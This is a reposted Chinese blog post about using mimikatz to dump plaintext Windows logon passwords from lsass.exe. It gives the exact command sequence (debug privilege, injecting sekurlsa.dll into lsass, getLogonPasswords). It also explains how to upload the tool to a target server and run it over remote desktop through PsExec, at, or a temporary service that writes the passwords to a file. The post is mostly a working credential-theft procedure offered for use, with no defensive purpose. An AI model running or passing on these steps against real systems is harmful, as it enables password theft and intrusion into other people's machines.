神器mimikatz--windows下抓取密码(转)

本文介绍了一个名为mimikatz的轻量级调试工具,由法国开发者制作,主要用于在Windows环境下直接抓取系统中的账户口令。文中详细记录了如何利用mimikatz工具通过不同的方法在本地或远程环境中成功获取lsass进程中的用户明文密码。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

mimikatz是法国人写的,windows下的轻量级调试器。可以直接抓取windows的口令。只要没有重启,登录过的账户口令都可以抓到。牛mimikatz----windows平台下的神器?

抓取 lsass.exe 中的用户明文密码:

//提升权限 privilege::debug 
//注入dll inject::process lsass.exe sekurlsa.dll
//抓取密码 @getLogonPasswords


在远程终端(3389、mstsc.exe)、虚拟桌面中抓取密码的方法:

通常你在远程终端中运行该程序会提示:存储空间不足,无法处理此命令。

这是因为在终端模式下,不能插入远线程,跨会话不能注入,你需要使用如下方法执行该程序:

首先提取几个文件,只抓取密码的话,只需要这几个文件:

mimikatz_trunk\tools\PsExec.exe
mimikatz_trunk\Win32\mimikatz.exe
mimikatz_trunk\Win32\sekurlsa.dll

打包后上传至目标服务器,然后解压释放,注意路径中绝对不能有中文(可以有空格)!否则加载DLL的时候会报错:找不到文件。

然后使用以下任何一种方法即可抓取密码:

 

//最简单实用的方法,使用 PsExec.exe 启动。 
//在本机启动交互式命令提示窗口 psexec\\127.0.0.1 cmd.exe
//启动 mimikatz.exe C:\mimikatz_trunk\Win32\mimikatz.exe
//提升权限 privilege::debug //注入dll,要用绝对路径!并且路径中绝对不能有中文(可以有空格)! inject::process lsass.exe "C:\mimikatz_trunk\Win32\sekurlsa.dll"
//抓取密码 @getLogonPasswords //退出,不要用 ctrl + c,会导致 mimikatz.exe CPU 占用达到 100%,死循环。 exit
//*********************************************************
//使用 At 启动 at *** //*********************************************************
//创建服务方法 sc create getpassword binpath= "cmd.exe /c c:\xxx\mimikatz.exe < command.txt > password.txt" sc start getpassword sc delete getpassword //*********************************************************
//telnet 远程命令管道 telnet ****

转载于:https://www.cnblogs.com/demonspider/archive/2012/05/25/2517882.html

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值